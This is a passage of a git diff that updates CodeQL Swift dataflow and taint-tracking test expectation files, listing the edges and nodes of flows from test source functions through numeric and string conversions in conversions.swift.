conversions.swift:115:12:115:33 | call to String.init(_:) | -| conversions.swift:116:12:116:33 | call to String.init(_:) | conversions.swift:116:12:116:35 | .utf8 | -| conversions.swift:116:19:116:32 | call to sourceDouble() | conversions.swift:116:12:116:33 | call to String.init(_:) | -| conversions.swift:118:18:118:30 | call to sourceFloat() | conversions.swift:118:12:118:31 | call to Float.init(_:) | -| conversions.swift:119:41:119:51 | call to sourceInt() | conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:119:67:119:67 | 0.0 | conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:41:120:41 | 0 | conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:57:120:69 | call to sourceFloat() | conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | -| conversions.swift:121:54:121:54 | 0.0 | conversions.swift:121:12:121:57 | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:122:44:122:56 | call to sourceFloat() | conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:124:12:124:24 | call to sourceFloat() | conversions.swift:124:12:124:26 | .exponent | -| conversions.swift:125:12:125:24 | call to sourceFloat() | conversions.swift:125:12:125:26 | .significand | -| conversions.swift:126:12:126:26 | call to sourceFloat80() | conversions.swift:126:12:126:28 | .exponent | -| conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | -| conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | -| conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | -| conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | +| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | +| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | +| conversions.swift:112:12:112:41 | call to String.init(_:) | conversions.swift:112:12:112:43 | .utf8 | +| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:41 | call to String.init(_:) | +| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | +| conversions.swift:114:12:114:43 | call to String.init(_:) | conversions.swift:114:12:114:45 | .utf8 | +| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:43 | call to String.init(_:) | +| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | +| conversions.swift:116:12:116:42 | call to String.init(_:) | conversions.swift:116:12:116:44 | .utf8 | +| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:42 | call to String.init(_:) | +| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | +| conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:119:76:119:76 | 0.0 | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:120:41:120:41 | 0 | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | +| conversions.swift:121:63:121:63 | 0.0 | conversions.swift:121:12:121:66 | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | +| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | +| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | +| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | +| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | +| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | +| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | +| conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | | conversions.swift:138:6:138:6 | SSA def(ms1) | conversions.swift:139:12:139:12 | ms1 | | conversions.swift:138:6:138:6 | ms1 | conversions.swift:138:6:138:6 | SSA def(ms1) | | conversions.swift:138:12:138:26 | call to MyString.init(_:) | conversions.swift:138:12:138:27 | ...! | @@ -140,9 +140,9 @@ | conversions.swift:141:12:141:12 | ms1 | conversions.swift:142:12:142:12 | ms1 | | conversions.swift:144:6:144:6 | SSA def(ms2) | conversions.swift:145:12:145:12 | ms2 | | conversions.swift:144:6:144:6 | ms2 | conversions.swift:144:6:144:6 | SSA def(ms2) | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:144:12:144:36 | ...! | -| conversions.swift:144:12:144:36 | ...! | conversions.swift:144:6:144:6 | ms2 | -| conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:144:12:144:35 | call to MyString.init(_:) | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:144:12:144:46 | ...! | +| conversions.swift:144:12:144:46 | ...! | conversions.swift:144:6:144:6 | ms2 | +| conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) | | conversions.swift:145:12:145:12 | [post] ms2 | conversions.swift:146:12:146:12 | ms2 | | conversions.swift:145:12:145:12 | ms2 | conversions.swift:146:12:146:12 | ms2 | | conversions.swift:146:12:146:12 | [post] ms2 | conversions.swift:147:12:147:12 | ms2 | @@ -154,7 +154,7 @@ | conversions.swift:152:6:152:6 | SSA def(parent) | conversions.swift:153:12:153:12 | parent | | conversions.swift:152:6:152:6 | parent | conversions.swift:152:6:152:6 | SSA def(parent) | | conversions.swift:152:6:152:15 | ... as ... | conversions.swift:152:6:152:6 | parent | -| conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:152:6:152:15 | ... as ... | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:152:6:152:15 | ... as ... | | conversions.swift:153:12:153:12 | [post] parent | conversions.swift:154:12:154:12 | parent | | conversions.swift:153:12:153:12 | parent | conversions.swift:154:12:154:12 | parent | | conversions.swift:154:12:154:12 | [post] parent | conversions.swift:156:40:156:40 | parent | @@ -175,7 +175,7 @@ | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:171:7:171:7 | arr1 | | conversions.swift:172:7:172:7 | SSA def(arr2) | conversions.swift:174:13:174:13 | arr2 | | conversions.swift:172:7:172:7 | arr2 | conversions.swift:172:7:172:7 | SSA def(arr2) | -| conversions.swift:172:14:172:26 | [...] | conversions.swift:172:7:172:7 | arr2 | +| conversions.swift:172:14:172:33 | [...] | conversions.swift:172:7:172:7 | arr2 | | conversions.swift:173:13:173:13 | arr1 | conversions.swift:175:13:175:13 | arr1 | | conversions.swift:174:13:174:13 | arr2 | conversions.swift:176:13:176:13 | arr2 | | conversions.swift:175:13:175:13 | [post] arr1 | conversions.swift:178:25:178:25 | arr1 | diff --git a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected index 104e2baa545..38d1de0167e 100644 --- a/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected +++ b/swift/ql/test/library-tests/dataflow/taint/core/Taint.expected @@ -1,68 +1,68 @@ edges -| conversions.swift:35:18:35:28 | call to sourceInt() | conversions.swift:35:12:35:29 | call to Float.init(_:) | provenance | | -| conversions.swift:36:19:36:29 | call to sourceInt() | conversions.swift:36:12:36:30 | call to String.init(_:) | provenance | | -| conversions.swift:37:12:37:30 | call to String.init(_:) | conversions.swift:37:12:37:32 | .utf8 | provenance | | -| conversions.swift:37:19:37:29 | call to sourceInt() | conversions.swift:37:12:37:30 | call to String.init(_:) | provenance | | -| conversions.swift:39:12:39:30 | [...] [Collection element] | conversions.swift:40:12:40:12 | arr | provenance | | -| conversions.swift:39:12:39:30 | [...] [Collection element] | conversions.swift:41:12:41:12 | arr [Collection element] | provenance | | -| conversions.swift:39:12:39:30 | [...] [Collection element] | conversions.swift:42:20:42:20 | arr [Collection element] | provenance | | -| conversions.swift:39:12:39:30 | [...] [Collection element] | conversions.swift:43:20:43:20 | arr [Collection element] | provenance | | -| conversions.swift:39:19:39:29 | call to sourceInt() | conversions.swift:39:12:39:30 | [...] [Collection element] | provenance | | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | conversions.swift:35:12:35:38 | call to Float.init(_:) | provenance | | +| conversions.swift:36:19:36:38 | call to sourceInt(_:) | conversions.swift:36:12:36:39 | call to String.init(_:) | provenance | | +| conversions.swift:37:12:37:39 | call to String.init(_:) | conversions.swift:37:12:37:41 | .utf8 | provenance | | +| conversions.swift:37:19:37:38 | call to sourceInt(_:) | conversions.swift:37:12:37:39 | call to String.init(_:) | provenance | | +| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:40:12:40:12 | arr | provenance | | +| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:41:12:41:12 | arr [Collection element] | provenance | | +| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:42:20:42:20 | arr [Collection element] | provenance | | +| conversions.swift:39:12:39:39 | [...] [Collection element] | conversions.swift:43:20:43:20 | arr [Collection element] | provenance | | +| conversions.swift:39:19:39:38 | call to sourceInt(_:) | conversions.swift:39:12:39:39 | [...] [Collection element] | provenance | | | conversions.swift:41:12:41:12 | arr [Collection element] | conversions.swift:41:12:41:17 | ...[...] | provenance | | | conversions.swift:42:20:42:20 | arr [Collection element] | conversions.swift:42:12:42:23 | call to Array.init(_:) | provenance | | | conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | conversions.swift:43:12:43:26 | ...[...] | provenance | | | conversions.swift:43:20:43:20 | arr [Collection element] | conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:44:20:44:33 | call to sourceString() | conversions.swift:44:20:44:35 | .utf8 | provenance | | -| conversions.swift:44:20:44:35 | .utf8 | conversions.swift:44:12:44:39 | call to Array.init(_:) | provenance | | -| conversions.swift:45:12:45:39 | call to Array.init(_:) [Collection element] | conversions.swift:45:12:45:42 | ...[...] | provenance | | -| conversions.swift:45:20:45:33 | call to sourceString() | conversions.swift:45:20:45:35 | .utf8 | provenance | | -| conversions.swift:45:20:45:35 | .utf8 | conversions.swift:45:12:45:39 | call to Array.init(_:) [Collection element] | provenance | | -| conversions.swift:47:13:47:23 | call to sourceInt() | conversions.swift:48:13:48:13 | v | provenance | | -| conversions.swift:51:18:51:41 | call to numericCast(_:) | conversions.swift:52:12:52:12 | v2 | provenance | | -| conversions.swift:51:30:51:40 | call to sourceInt() | conversions.swift:51:18:51:41 | call to numericCast(_:) | provenance | | -| conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | conversions.swift:55:12:55:12 | v4 | provenance | | -| conversions.swift:54:31:54:41 | call to sourceInt() | conversions.swift:54:17:54:57 | call to unsafeBitCast(_:to:) | provenance | | -| conversions.swift:63:11:63:26 | call to abs(_:) | conversions.swift:64:12:64:12 | v7 | provenance | | -| conversions.swift:63:15:63:25 | call to sourceInt() | conversions.swift:63:11:63:26 | call to abs(_:) | provenance | | -| conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | conversions.swift:75:12:75:42 | ...! | provenance | | -| conversions.swift:75:16:75:29 | call to sourceString() | conversions.swift:75:12:75:41 | call to Self.init(_:radix:) [some:0] | provenance | | -| conversions.swift:77:30:77:40 | call to sourceInt() | conversions.swift:77:12:77:41 | call to Self.init(littleEndian:) | provenance | | -| conversions.swift:78:27:78:37 | call to sourceInt() | conversions.swift:78:12:78:38 | call to Self.init(bigEndian:) | provenance | | -| conversions.swift:79:12:79:22 | call to sourceInt() | conversions.swift:79:12:79:24 | .littleEndian | provenance | | -| conversions.swift:80:12:80:22 | call to sourceInt() | conversions.swift:80:12:80:24 | .bigEndian | provenance | | -| conversions.swift:109:18:109:30 | call to sourceFloat() | conversions.swift:109:12:109:31 | call to Float.init(_:) | provenance | | -| conversions.swift:111:19:111:31 | call to sourceFloat() | conversions.swift:111:12:111:32 | call to String.init(_:) | provenance | | -| conversions.swift:112:12:112:32 | call to String.init(_:) | conversions.swift:112:12:112:34 | .utf8 | provenance | | -| conversions.swift:112:19:112:31 | call to sourceFloat() | conversions.swift:112:12:112:32 | call to String.init(_:) | provenance | | -| conversions.swift:113:19:113:33 | call to sourceFloat80() | conversions.swift:113:12:113:34 | call to String.init(_:) | provenance | | -| conversions.swift:114:12:114:34 | call to String.init(_:) | conversions.swift:114:12:114:36 | .utf8 | provenance | | -| conversions.swift:114:19:114:33 | call to sourceFloat80() | conversions.swift:114:12:114:34 | call to String.init(_:) | provenance | | -| conversions.swift:115:19:115:32 | call to sourceDouble() | conversions.swift:115:12:115:33 | call to String.init(_:) | provenance | | -| conversions.swift:116:12:116:33 | call to String.init(_:) | conversions.swift:116:12:116:35 | .utf8 | provenance | | -| conversions.swift:116:19:116:32 | call to sourceDouble() | conversions.swift:116:12:116:33 | call to String.init(_:) | provenance | | -| conversions.swift:118:18:118:30 | call to sourceFloat() | conversions.swift:118:12:118:31 | call to Float.init(_:) | provenance | | -| conversions.swift:119:41:119:51 | call to sourceInt() | conversions.swift:119:12:119:70 | call to Float.init(sign:exponent:significand:) | provenance | | -| conversions.swift:120:57:120:69 | call to sourceFloat() | conversions.swift:120:12:120:70 | call to Float.init(sign:exponent:significand:) | provenance | | -| conversions.swift:122:44:122:56 | call to sourceFloat() | conversions.swift:122:12:122:57 | call to Float.init(signOf:magnitudeOf:) | provenance | | -| conversions.swift:124:12:124:24 | call to sourceFloat() | conversions.swift:124:12:124:26 | .exponent | provenance | | -| conversions.swift:125:12:125:24 | call to sourceFloat() | conversions.swift:125:12:125:26 | .significand | provenance | | -| conversions.swift:126:12:126:26 | call to sourceFloat80() | conversions.swift:126:12:126:28 | .exponent | provenance | | -| conversions.swift:127:12:127:26 | call to sourceFloat80() | conversions.swift:127:12:127:28 | .significand | provenance | | -| conversions.swift:128:12:128:25 | call to sourceDouble() | conversions.swift:128:12:128:27 | .exponent | provenance | | -| conversions.swift:129:12:129:25 | call to sourceDouble() | conversions.swift:129:12:129:27 | .significand | provenance | | -| conversions.swift:136:19:136:32 | call to sourceString() | conversions.swift:136:12:136:33 | call to String.init(_:) | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:144:12:144:35 | call to MyString.init(_:) [some:0] | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:145:12:145:12 | ms2 | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:146:12:146:16 | .description | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) | conversions.swift:147:12:147:16 | .debugDescription | provenance | | -| conversions.swift:144:12:144:35 | call to MyString.init(_:) [some:0] | conversions.swift:144:12:144:36 | ...! | provenance | | -| conversions.swift:144:12:144:36 | ...! | conversions.swift:145:12:145:12 | ms2 | provenance | | -| conversions.swift:144:12:144:36 | ...! | conversions.swift:146:12:146:16 | .description | provenance | | -| conversions.swift:144:12:144:36 | ...! | conversions.swift:147:12:147:16 | .debugDescription | provenance | | -| conversions.swift:144:21:144:34 | call to sourceString() | conversions.swift:144:12:144:35 | call to MyString.init(_:) | provenance | | -| conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:153:12:153:12 | parent | provenance | | -| conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:154:12:154:12 | parent | provenance | | -| conversions.swift:152:31:152:44 | call to sourceString() | conversions.swift:156:40:156:40 | parent | provenance | | +| conversions.swift:44:20:44:42 | call to sourceString(_:) | conversions.swift:44:20:44:44 | .utf8 | provenance | | +| conversions.swift:44:20:44:44 | .utf8 | conversions.swift:44:12:44:48 | call to Array.init(_:) | provenance | | +| conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | conversions.swift:45:12:45:51 | ...[...] | provenance | | +| conversions.swift:45:20:45:42 | call to sourceString(_:) | conversions.swift:45:20:45:44 | .utf8 | provenance | | +| conversions.swift:45:20:45:44 | .utf8 | conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:47:13:47:32 | call to sourceInt(_:) | conversions.swift:48:13:48:13 | v | provenance | | +| conversions.swift:51:18:51:50 | call to numericCast(_:) | conversions.swift:52:12:52:12 | v2 | provenance | | +| conversions.swift:51:30:51:49 | call to sourceInt(_:) | conversions.swift:51:18:51:50 | call to numericCast(_:) | provenance | | +| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | conversions.swift:55:12:55:12 | v4 | provenance | | +| conversions.swift:54:31:54:50 | call to sourceInt(_:) | conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | provenance | | +| conversions.swift:63:11:63:35 | call to abs(_:) | conversions.swift:64:12:64:12 | v7 | provenance | | +| conversions.swift:63:15:63:34 | call to sourceInt(_:) | conversions.swift:63:11:63:35 | call to abs(_:) | provenance | | +| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | conversions.swift:75:12:75:51 | ...! | provenance | | +| conversions.swift:75:16:75:38 | call to sourceString(_:) | conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | provenance | | +| conversions.swift:77:30:77:49 | call to sourceInt(_:) | conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | provenance | | +| conversions.swift:78:27:78:46 | call to sourceInt(_:) | conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | provenance | | +| conversions.swift:79:12:79:31 | call to sourceInt(_:) | conversions.swift:79:12:79:33 | .littleEndian | provenance | | +| conversions.swift:80:12:80:31 | call to sourceInt(_:) | conversions.swift:80:12:80:33 | .bigEndian | provenance | | +| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | conversions.swift:109:12:109:40 | call to Float.init(_:) | provenance | | +| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | conversions.swift:111:12:111:41 | call to String.init(_:) | provenance | | +| conversions.swift:112:12:112:41 | call to String.init(_:) | conversions.swift:112:12:112:43 | .utf8 | provenance | | +| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | conversions.swift:112:12:112:41 | call to String.init(_:) | provenance | | +| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | conversions.swift:113:12:113:43 | call to String.init(_:) | provenance | | +| conversions.swift:114:12:114:43 | call to String.init(_:) | conversions.swift:114:12:114:45 | .utf8 | provenance | | +| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | conversions.swift:114:12:114:43 | call to String.init(_:) | provenance | | +| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | conversions.swift:115:12:115:42 | call to String.init(_:) | provenance | | +| conversions.swift:116:12:116:42 | call to String.init(_:) | conversions.swift:116:12:116:44 | .utf8 | provenance | | +| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | conversions.swift:116:12:116:42 | call to String.init(_:) | provenance | | +| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | conversions.swift:118:12:118:40 | call to Float.init(_:) | provenance | | +| conversions.swift:119:41:119:60 | call to sourceInt(_:) | conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | provenance | | +| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | provenance | | +| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | provenance | | +| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | conversions.swift:124:12:124:35 | .exponent | provenance | | +| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | conversions.swift:125:12:125:35 | .significand | provenance | | +| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | conversions.swift:126:12:126:37 | .exponent | provenance | | +| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | conversions.swift:127:12:127:37 | .significand | provenance | | +| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | conversions.swift:128:12:128:36 | .exponent | provenance | | +| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | conversions.swift:129:12:129:36 | .significand | provenance | | +| conversions.swift:136:19:136:42 | call to sourceString(_:) | conversions.swift:136:12:136:43 | call to String.init(_:) | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:145:12:145:12 | ms2 | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:146:12:146:16 | .description | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) | conversions.swift:147:12:147:16 | .debugDescription | provenance | | +| conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | conversions.swift:144:12:144:46 | ...! | provenance | | +| conversions.swift:144:12:144:46 | ...! | conversions.swift:145:12:145:12 | ms2 | provenance | | +| conversions.swift:144:12:144:46 | ...! | conversions.swift:146:12:146:16 | .description | provenance | | +| conversions.swift:144:12:144:46 | ...! | conversions.swift:147:12:147:16 | .debugDescription | provenance | | +| conversions.swift:144:21:144:44 | call to sourceString(_:) | conversions.swift:144:12:144:45 | call to MyString.init(_:) | provenance | | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:153:12:153:12 | parent | provenance | | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:154:12:154:12 | parent | provenance | | +| conversions.swift:152:31:152:54 | call to sourceString(_:) | conversions.swift:156:40:156:40 | parent | provenance | | | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:157:12:157:12 | v3 | provenance | | | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | conversions.swift:158:12:158:12 | v3 | provenance | | | conversions.swift:156:40:156:40 | parent | conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | provenance | | @@ -70,11 +70,11 @@ edges | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:175:13:175:19 | ...[...] | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:178:25:178:25 | arr1 | provenance | | | conversions.swift:171:14:171:33 | call to sourceArray(_:) | conversions.swift:185:31:185:31 | arr1 | provenance | | -| conversions.swift:172:14:172:26 | [...] [Collection element] | conversions.swift:174:13:174:13 | arr2 | provenance | | -| conversions.swift:172:14:172:26 | [...] [Collection element] | conversions.swift:176:13:176:13 | arr2 [Collection element] | provenance | | -| conversions.swift:172:14:172:26 | [...] [Collection element] | conversions.swift:179:25:179:25 | arr2 [Collection element] | provenance | | -| conversions.swift:172:14:172:26 | [...] [Collection element] | conversions.swift:186:31:186:31 | arr2 [Collection element] | provenance | | -| conversions.swift:172:15:172:25 | call to sourceInt() | conversions.swift:172:14:172:26 | [...] [Collection element] | provenance | | +| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:174:13:174:13 | arr2 | provenance | | +| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:176:13:176:13 | arr2 [Collection element] | provenance | | +| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:179:25:179:25 | arr2 [Collection element] | provenance | | +| conversions.swift:172:14:172:33 | [...] [Collection element] | conversions.swift:186:31:186:31 | arr2 [Collection element] | provenance | | +| conversions.swift:172:15:172:32 | call to sourceInt(_:) | conversions.swift:172:14:172:33 | [...] [Collection element] | provenance | | | conversions.swift:176:13:176:13 | arr2 [Collection element] | conversions.swift:176:13:176:19 | ...[...] | provenance | | | conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | conversions.swift:180:13:180:13 | arr1b | provenance | | | conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | conversions.swift:182:13:182:13 | arr1b [Collection element] | provenance | | @@ -114,18 +114,18 @@ edges | conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:225:13:225:25 | .v | provenance | | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | | conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | provenance | | -| conversions.swift:232:26:232:37 | call to sourceUInt() | conversions.swift:205:7:205:17 | withUInt | provenance | | -| conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | conversions.swift:211:7:211:20 | withMyValue [v] | provenance | | -| conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:235:37:235:47 | call to sourceInt() | conversions.swift:235:29:235:48 | call to MyValue.init(_:) [v] | provenance | | -| conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | provenance | | -| conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | conversions.swift:238:12:238:50 | call to Int.init(withMyValue2:) | provenance | | -| conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:238:38:238:48 | call to sourceInt() | conversions.swift:238:30:238:49 | call to MyValue.init(_:) [v] | provenance | | -| conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | provenance | | -| conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | conversions.swift:241:12:241:55 | call to mkInt(withMyValue:) | provenance | | -| conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:241:43:241:53 | call to sourceInt() | conversions.swift:241:35:241:54 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:232:26:232:43 | call to sourceUInt(_:) | conversions.swift:205:7:205:17 | withUInt | provenance | | +| conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | conversions.swift:211:7:211:20 | withMyValue [v] | provenance | | +| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | +| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | provenance | | +| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | provenance | | +| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | +| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | provenance | | +| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | provenance | | +| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | +| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | provenance | | | file://:0:0:0:0 | [post] self [first] | stringinterpolation.swift:6:6:6:6 | self [Return] [first] | provenance | | | file://:0:0:0:0 | [post] self [second] | stringinterpolation.swift:7:6:7:6 | self [Return] [second] | provenance | | | file://:0:0:0:0 | self [first] | file://:0:0:0:0 | .first | provenance | | @@ -209,16 +209,16 @@ edges | try.swift:18:18:18:25 | call to source() | try.swift:18:18:18:25 | call to source() [some:0] | provenance | | | try.swift:18:18:18:25 | call to source() [some:0] | try.swift:18:13:18:25 | try? ... [some:0] | provenance | | nodes -| conversions.swift:32:12:32:22 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:35:12:35:29 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:35:18:35:28 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:36:12:36:30 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:36:19:36:29 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:37:12:37:30 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:37:12:37:32 | .utf8 | semmle.label | .utf8 | -| conversions.swift:37:19:37:29 | call to sourceInt() | semmle.label | call to sourceInt() | -| conversions.swift:39:12:39:30 | [...] [Collection element] | semmle.label | [...] [Collection element] | -| conversions.swift:39:19:39:29 | call to sourceInt() | semmle.label | call to sourceInt() | +| conversions.swift:32:12:32:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:35:12:35:38 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:35:18:35:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:36:12:36:39 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:36:19:36:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:37:12:37:39 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:37:12:37:41 | .utf8 | semmle.label | .utf8 | +| conversions.swift:37:19:37:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:39:12:39:39 | [...] [Collection element] | semmle.label | [...] 